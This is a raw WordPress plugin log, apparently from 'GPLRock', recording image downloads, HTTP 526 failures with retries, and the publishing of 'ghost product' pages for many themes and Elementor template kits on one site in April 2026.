https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9575cec1.jpg [04-Apr-2026 21:43:43 UTC] GPLRock: Ghost product published with image - Product ID: deliverra-food-grocery-delivery-app-elementor-template-kit [04-Apr-2026 21:44:32 UTC] GPLRock: Image downloaded successfully for product autodrive-car-rental-dealer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd8e27b0.webp [04-Apr-2026 21:44:32 UTC] GPLRock: Using pre-downloaded image for product autodrive-car-rental-dealer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd8e27b0.webp [04-Apr-2026 21:44:32 UTC] GPLRock: Ghost product published with image - Product ID: autodrive-car-rental-dealer-elementor-template-kit [04-Apr-2026 21:44:33 UTC] GPLRock: Image downloaded successfully for product autocar-car-dealer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89e47f95.webp [04-Apr-2026 21:44:33 UTC] GPLRock: Using pre-downloaded image for product autocar-car-dealer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89e47f95.webp [04-Apr-2026 21:44:33 UTC] GPLRock: Ghost product published with image - Product ID: autocar-car-dealer-elementor-template-kit [04-Apr-2026 21:44:34 UTC] GPLRock: Image downloaded successfully for product ausa-autocar-salon-detailing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-355dd0d4.webp [04-Apr-2026 21:44:34 UTC] GPLRock: Using pre-downloaded image for product ausa-autocar-salon-detailing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-355dd0d4.webp [04-Apr-2026 21:44:34 UTC] GPLRock: Ghost product published with image - Product ID: ausa-autocar-salon-detailing-services-elementor-template-kit [04-Apr-2026 21:44:36 UTC] GPLRock: Image downloaded successfully for product auriga-health-coach-yoga-mentor-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a04f0086.jpg [04-Apr-2026 21:44:36 UTC] GPLRock: Using pre-downloaded image for product auriga-health-coach-yoga-mentor-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a04f0086.jpg [04-Apr-2026 21:44:36 UTC] GPLRock: Ghost product published with image - Product ID: auriga-health-coach-yoga-mentor-elementor-template-kit [04-Apr-2026 21:44:38 UTC] GPLRock: Image downloaded successfully for product audios-app-showcase-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4457371.jpg [04-Apr-2026 21:44:38 UTC] GPLRock: Using pre-downloaded image for product audios-app-showcase-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4457371.jpg [04-Apr-2026 21:44:38 UTC] GPLRock: Ghost product published with image - Product ID: audios-app-showcase-elementor-template-kit [04-Apr-2026 21:44:39 UTC] GPLRock: Image downloaded successfully for product atravel-travel-agency-elementor-pro-full-site-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-341b53e4.jpg [04-Apr-2026 21:44:39 UTC] GPLRock: Using pre-downloaded image for product atravel-travel-agency-elementor-pro-full-site-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-341b53e4.jpg [04-Apr-2026 21:44:39 UTC] GPLRock: Ghost product published with image - Product ID: atravel-travel-agency-elementor-pro-full-site-template-kit [04-Apr-2026 21:44:41 UTC] GPLRock: Image downloaded successfully for product atra-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49291e4e.webp [04-Apr-2026 21:44:41 UTC] GPLRock: Using pre-downloaded image for product atra-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49291e4e.webp [04-Apr-2026 21:44:41 UTC] GPLRock: Ghost product published with image - Product ID: atra-creative-agency-elementor-template-kit [04-Apr-2026 21:44:42 UTC] GPLRock: Image downloaded successfully for product atoz-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d4d73c70.webp [04-Apr-2026 21:44:42 UTC] GPLRock: Using pre-downloaded image for product atoz-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d4d73c70.webp [04-Apr-2026 21:44:43 UTC] GPLRock: Ghost product published with image - Product ID: atoz-blog-magazine-elementor-template-kit [04-Apr-2026 21:44:44 UTC] GPLRock: Image downloaded successfully for product atoms-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0d1fab1.webp [04-Apr-2026 21:44:44 UTC] GPLRock: Using pre-downloaded image for product atoms-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0d1fab1.webp [04-Apr-2026 21:44:44 UTC] GPLRock: Ghost product published with image - Product ID: atoms-blog-magazine-elementor-template-kit [04-Apr-2026 21:44:45 UTC] GPLRock: Image downloaded successfully for product atap-roofing-service-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3f35bee9.webp [04-Apr-2026 21:44:46 UTC] GPLRock: Using pre-downloaded image for product atap-roofing-service-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3f35bee9.webp [04-Apr-2026 21:44:46 UTC] GPLRock: Ghost product published with image - Product ID: atap-roofing-service-construction-elementor-template-kit [04-Apr-2026 21:45:33 UTC] GPLRock: Image downloaded successfully for product adrena-airsoft-club-paintball-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb419c10.png [04-Apr-2026 21:45:33 UTC] GPLRock: Using pre-downloaded image for product adrena-airsoft-club-paintball-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb419c10.png [04-Apr-2026 21:45:33 UTC] GPLRock: Ghost product published with image - Product ID: adrena-airsoft-club-paintball-wordpress-theme [04-Apr-2026 21:45:35 UTC] GPLRock: Image downloaded successfully for product skin-beauty-spa-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd092231.png [04-Apr-2026 21:45:35 UTC] GPLRock: Using pre-downloaded image for product skin-beauty-spa-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd092231.png [04-Apr-2026 21:45:35 UTC] GPLRock: Ghost product published with image - Product ID: skin-beauty-spa-wordpress [04-Apr-2026 21:45:37 UTC] GPLRock: Image downloaded successfully for product creatic-one-page-parallax-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fedddc8c.jpg [04-Apr-2026 21:45:37 UTC] GPLRock: Using pre-downloaded image for product creatic-one-page-parallax-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fedddc8c.jpg [04-Apr-2026 21:45:37 UTC] GPLRock: Ghost product published with image - Product ID: creatic-one-page-parallax-wordpress [04-Apr-2026 21:45:39 UTC] GPLRock: Image downloaded successfully for product soundrise-artists-producers-and-record-labels-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-600265e2.png [04-Apr-2026 21:45:39 UTC] GPLRock: Using pre-downloaded image for product soundrise-artists-producers-and-record-labels-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-600265e2.png [04-Apr-2026 21:45:39 UTC] GPLRock: Ghost product published with image - Product ID: soundrise-artists-producers-and-record-labels-wordpress-theme [04-Apr-2026 21:45:41 UTC] GPLRock: Image downloaded successfully for product easy-custom-js-and-css-extra-custmization-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e77cd21d.jpg [04-Apr-2026 21:45:41 UTC] GPLRock: Using pre-downloaded image for product easy-custom-js-and-css-extra-custmization-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e77cd21d.jpg [04-Apr-2026 21:45:41 UTC] GPLRock: Ghost product published with image - Product ID: easy-custom-js-and-css-extra-custmization-for-wordpress [04-Apr-2026 21:45:42 UTC] GPLRock: Image downloaded successfully for product apushome-real-estate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e146ff2b.jpg [04-Apr-2026 21:45:42 UTC] GPLRock: Using pre-downloaded image for product apushome-real-estate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e146ff2b.jpg [04-Apr-2026 21:45:42 UTC] GPLRock: Ghost product published with image - Product ID: apushome-real-estate-wordpress-theme [04-Apr-2026 21:45:44 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-recommended-products-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1578146f.jpg [04-Apr-2026 21:45:44 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-recommended-products-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1578146f.jpg [04-Apr-2026 21:45:44 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-recommended-products-addon [04-Apr-2026 21:45:45 UTC] GPLRock: Image downloaded successfully for product edd-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51a3fdc3.jpg [04-Apr-2026 21:45:45 UTC] GPLRock: Using pre-downloaded image for product edd-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51a3fdc3.jpg [04-Apr-2026 21:45:45 UTC] GPLRock: Ghost product published with image - Product ID: edd-for-amp [04-Apr-2026 21:45:47 UTC] GPLRock: Image downloaded successfully for product questionar-faq-accordions-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27de26dd.jpg [04-Apr-2026 21:45:47 UTC] GPLRock: Using pre-downloaded image for product questionar-faq-accordions-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27de26dd.jpg [04-Apr-2026 21:45:47 UTC] GPLRock: Ghost product published with image - Product ID: questionar-faq-accordions-for-elementor [04-Apr-2026 21:45:49 UTC] GPLRock: Image downloaded successfully for product autopilot-seo-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf641a3a.png [04-Apr-2026 21:45:49 UTC] GPLRock: Using pre-downloaded image for product autopilot-seo-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf641a3a.png [04-Apr-2026 21:45:49 UTC] GPLRock: Ghost product published with image - Product ID: autopilot-seo-for-woocommerce [04-Apr-2026 21:46:36 UTC] GPLRock: Image downloaded successfully for product perbra-car-auto-care-detailing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a106598d.jpg [04-Apr-2026 21:46:36 UTC] GPLRock: Using pre-downloaded image for product perbra-car-auto-care-detailing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a106598d.jpg [04-Apr-2026 21:46:36 UTC] GPLRock: Ghost product published with image - Product ID: perbra-car-auto-care-detailing-elementor-template-kit [04-Apr-2026 21:46:38 UTC] GPLRock: Image downloaded successfully for product sellbiz-startup-and-business-marketplace-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e59cc1b.jpg [04-Apr-2026 21:46:38 UTC] GPLRock: Using pre-downloaded image for product sellbiz-startup-and-business-marketplace-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e59cc1b.jpg [04-Apr-2026 21:46:38 UTC] GPLRock: Ghost product published with image - Product ID: sellbiz-startup-and-business-marketplace-elementor-template-kit [04-Apr-2026 21:46:40 UTC] GPLRock: Image downloaded successfully for product tiktok-feed-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-098df6ea.jpg [04-Apr-2026 21:46:40 UTC] GPLRock: Using pre-downloaded image for product tiktok-feed-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-098df6ea.jpg [04-Apr-2026 21:46:40 UTC] GPLRock: Ghost product published with image - Product ID: tiktok-feed-pro [04-Apr-2026 21:46:42 UTC] GPLRock: Image downloaded successfully for product mrittik-architecture-interior-design-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e1efc5e.png [04-Apr-2026 21:46:42 UTC] GPLRock: Using pre-downloaded image for product mrittik-architecture-interior-design-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e1efc5e.png [04-Apr-2026 21:46:42 UTC] GPLRock: Ghost product published with image - Product ID: mrittik-architecture-interior-design-theme [04-Apr-2026 21:46:44 UTC] GPLRock: Image downloaded successfully for product floens-tiling-flooring-services-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4aea1d5b.jpg [04-Apr-2026 21:46:44 UTC] GPLRock: Using pre-downloaded image for product floens-tiling-flooring-services-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4aea1d5b.jpg [04-Apr-2026 21:46:44 UTC] GPLRock: Ghost product published with image - Product ID: floens-tiling-flooring-services-wordpress-theme [04-Apr-2026 21:46:46 UTC] GPLRock: Image downloaded successfully for product tracyle-waste-management-recycling-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9c1f5b2.png [04-Apr-2026 21:46:46 UTC] GPLRock: Using pre-downloaded image for product tracyle-waste-management-recycling-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9c1f5b2.png [04-Apr-2026 21:46:46 UTC] GPLRock: Ghost product published with image - Product ID: tracyle-waste-management-recycling-service-elementor-template-kit [04-Apr-2026 21:46:48 UTC] GPLRock: Image downloaded successfully for product glofia-golf-club-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3460829.jpg [04-Apr-2026 21:46:48 UTC] GPLRock: Using pre-downloaded image for product glofia-golf-club-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3460829.jpg [04-Apr-2026 21:46:48 UTC] GPLRock: Ghost product published with image - Product ID: glofia-golf-club-course-elementor-template-kit [04-Apr-2026 21:46:49 UTC] GPLRock: Image downloaded successfully for product modora-interior-design-architecture-service-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2654c86.jpg [04-Apr-2026 21:46:49 UTC] GPLRock: Using pre-downloaded image for product modora-interior-design-architecture-service-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2654c86.jpg [04-Apr-2026 21:46:50 UTC] GPLRock: Ghost product published with image - Product ID: modora-interior-design-architecture-service-elementor-pro-template-kit [04-Apr-2026 21:46:52 UTC] GPLRock: Image downloaded successfully for product sonne-solar-renewable-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d950bb76.png [04-Apr-2026 21:46:52 UTC] GPLRock: Using pre-downloaded image for product sonne-solar-renewable-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d950bb76.png [04-Apr-2026 21:46:52 UTC] GPLRock: Ghost product published with image - Product ID: sonne-solar-renewable-energy-elementor-template-kit [04-Apr-2026 21:46:53 UTC] GPLRock: Image downloaded successfully for product storeca-storage-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a0e8d16.jpg [04-Apr-2026 21:46:53 UTC] GPLRock: Using pre-downloaded image for product storeca-storage-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a0e8d16.jpg [04-Apr-2026 21:46:53 UTC] GPLRock: Ghost product published with image - Product ID: storeca-storage-service-elementor-template-kit [04-Apr-2026 21:47:51 UTC] GPLRock: Image download failed for product newyork-elementor-multi-purpose-prestashop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:47:53 UTC] GPLRock: Image download failed for product newyork-elementor-multi-purpose-prestashop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:47:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newyork--elementor-multi-purpose-prestashop-theme-13053.webp for product newyork-elementor-multi-purpose-prestashop-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:47:55 UTC] GPLRock: Image download failed for product newyork-elementor-multi-purpose-prestashop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:47:57 UTC] GPLRock: Image download failed for product newyork-elementor-multi-purpose-prestashop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:47:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newyork--elementor-multi-purpose-prestashop-theme-13053.webp for product newyork-elementor-multi-purpose-prestashop-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:47:59 UTC] GPLRock WARNING: Image download failed for product newyork-elementor-multi-purpose-prestashop-theme. URL: https://meldwp.com/wp-content/uploads/newyork--elementor-multi-purpose-prestashop-theme-13053.webp [04-Apr-2026 21:47:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newyork-elementor-multi-purpose-prestashop-theme [04-Apr-2026 21:47:59 UTC] GPLRock: Image download failed for product kartwow-wp-multipurpose-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:48:01 UTC] GPLRock: Image download failed for product kartwow-wp-multipurpose-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:48:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kartwow-wp---multipurpose-woocommerce-responsive-theme-9370.webp for product kartwow-wp-multipurpose-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:48:04 UTC] GPLRock: Image download failed for product kartwow-wp-multipurpose-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:48:06 UTC] GPLRock: Image download failed for product kartwow-wp-multipurpose-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:48:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kartwow-wp---multipurpose-woocommerce-responsive-theme-9370.webp for product kartwow-wp-multipurpose-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:48:08 UTC] GPLRock WARNING: Image download failed for product kartwow-wp-multipurpose-woocommerce-responsive-theme. URL: https://meldwp.com/wp-content/uploads/kartwow-wp---multipurpose-woocommerce-responsive-theme-9370.webp [04-Apr-2026 21:48:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kartwow-wp-multipurpose-woocommerce-responsive-theme [04-Apr-2026 21:48:08 UTC] GPLRock: Image download failed for product mefolio-ajax-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:48:10 UTC] GPLRock: Image download failed for product mefolio-ajax-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:57:57 UTC] GPLRock: Image downloaded successfully for product yellow-business-construction-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-19566d61.jpg [04-Apr-2026 21:57:57 UTC] GPLRock: Using pre-downloaded image for product yellow-business-construction-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-19566d61.jpg [04-Apr-2026 21:57:57 UTC] GPLRock: Ghost product published with image - Product ID: yellow-business-construction-template [04-Apr-2026 21:57:58 UTC] GPLRock: Image downloaded successfully for product camille-personal-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dfde1434.jpg [04-Apr-2026 21:57:58 UTC] GPLRock: Using pre-downloaded image for product camille-personal-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dfde1434.jpg [04-Apr-2026 21:57:58 UTC] GPLRock: Ghost product published with image - Product ID: camille-personal-magazine-wordpress-theme [04-Apr-2026 21:58:00 UTC] GPLRock: Image downloaded successfully for product beyoga-yogastudio-gym-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b04af7f8.jpg [04-Apr-2026 21:58:00 UTC] GPLRock: Using pre-downloaded image for product beyoga-yogastudio-gym-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b04af7f8.jpg [04-Apr-2026 21:58:00 UTC] GPLRock: Ghost product published with image - Product ID: beyoga-yogastudio-gym-wordpress-theme [04-Apr-2026 21:58:02 UTC] GPLRock: Image downloaded successfully for product pets-land-domestic-animals-shop-veterinary-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9b5e2a1b.png [04-Apr-2026 21:58:02 UTC] GPLRock: Using pre-downloaded image for product pets-land-domestic-animals-shop-veterinary-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9b5e2a1b.png [04-Apr-2026 21:58:02 UTC] GPLRock: Ghost product published with image - Product ID: pets-land-domestic-animals-shop-veterinary-wp [04-Apr-2026 21:58:04 UTC] GPLRock: Image downloaded successfully for product zorka-wonderful-fashion-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-248cbe5a.jpg [04-Apr-2026 21:58:04 UTC] GPLRock: Using pre-downloaded image for product zorka-wonderful-fashion-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-248cbe5a.jpg [04-Apr-2026 21:58:04 UTC] GPLRock: Ghost product published with image - Product ID: zorka-wonderful-fashion-woocommerce-theme [04-Apr-2026 21:58:06 UTC] GPLRock: Image downloaded successfully for product caverta-fine-dining-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8cd4a962.jpg [04-Apr-2026 21:58:06 UTC] GPLRock: Using pre-downloaded image for product caverta-fine-dining-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8cd4a962.jpg [04-Apr-2026 21:58:06 UTC] GPLRock: Ghost product published with image - Product ID: caverta-fine-dining-restaurant-wordpress-theme [04-Apr-2026 21:58:07 UTC] GPLRock: Image downloaded successfully for product blessing-wordpress-theme-for-church-and-charity-websites (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2cab24cc.jpg [04-Apr-2026 21:58:07 UTC] GPLRock: Using pre-downloaded image for product blessing-wordpress-theme-for-church-and-charity-websites: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2cab24cc.jpg [04-Apr-2026 21:58:07 UTC] GPLRock: Ghost product published with image - Product ID: blessing-wordpress-theme-for-church-and-charity-websites [04-Apr-2026 21:58:09 UTC] GPLRock: Image downloaded successfully for product openpos-woocommerce-point-of-salepos (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82c665cc.jpg [04-Apr-2026 21:58:09 UTC] GPLRock: Using pre-downloaded image for product openpos-woocommerce-point-of-salepos: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82c665cc.jpg [04-Apr-2026 21:58:09 UTC] GPLRock: Ghost product published with image - Product ID: openpos-woocommerce-point-of-salepos [04-Apr-2026 21:58:11 UTC] GPLRock: Image downloaded successfully for product capital-multi-purpose-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ddef624.jpg [04-Apr-2026 21:58:11 UTC] GPLRock: Using pre-downloaded image for product capital-multi-purpose-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ddef624.jpg [04-Apr-2026 21:58:11 UTC] GPLRock: Ghost product published with image - Product ID: capital-multi-purpose-business-wordpress-theme [04-Apr-2026 21:58:13 UTC] GPLRock: Image downloaded successfully for product prometeo-business-and-financial-site-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-abbf6355.jpg [04-Apr-2026 21:58:13 UTC] GPLRock: Using pre-downloaded image for product prometeo-business-and-financial-site-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-abbf6355.jpg [04-Apr-2026 21:58:13 UTC] GPLRock: Ghost product published with image - Product ID: prometeo-business-and-financial-site-template [04-Apr-2026 21:58:55 UTC] GPLRock: Image download failed for product wd-portfolio-galleries-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:58:57 UTC] GPLRock: Image download failed for product wd-portfolio-galleries-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:58:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wd-portfolio-galleries-wordpress-plugin-894.webp for product wd-portfolio-galleries-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:58:59 UTC] GPLRock: Image download failed for product wd-portfolio-galleries-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:02 UTC] GPLRock: Image download failed for product wd-portfolio-galleries-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wd-portfolio-galleries-wordpress-plugin-894.webp for product wd-portfolio-galleries-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:04 UTC] GPLRock WARNING: Image download failed for product wd-portfolio-galleries-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wd-portfolio-galleries-wordpress-plugin-894.webp [04-Apr-2026 21:59:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wd-portfolio-galleries-wordpress-plugin [04-Apr-2026 21:59:04 UTC] GPLRock: Image download failed for product appointo-booking-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:06 UTC] GPLRock: Image download failed for product appointo-booking-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appointo---booking-management-system-13309.webp for product appointo-booking-management-system after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:08 UTC] GPLRock: Image download failed for product appointo-booking-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:10 UTC] GPLRock: Image download failed for product appointo-booking-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appointo---booking-management-system-13309.webp for product appointo-booking-management-system after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:12 UTC] GPLRock WARNING: Image download failed for product appointo-booking-management-system. URL: https://meldwp.com/wp-content/uploads/appointo---booking-management-system-13309.webp [04-Apr-2026 21:59:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appointo-booking-management-system [04-Apr-2026 21:59:13 UTC] GPLRock: Image download failed for product preview-submission-in-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:15 UTC] GPLRock: Image download failed for product preview-submission-in-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:17 UTC] GPLRock Error: Failed to download image from 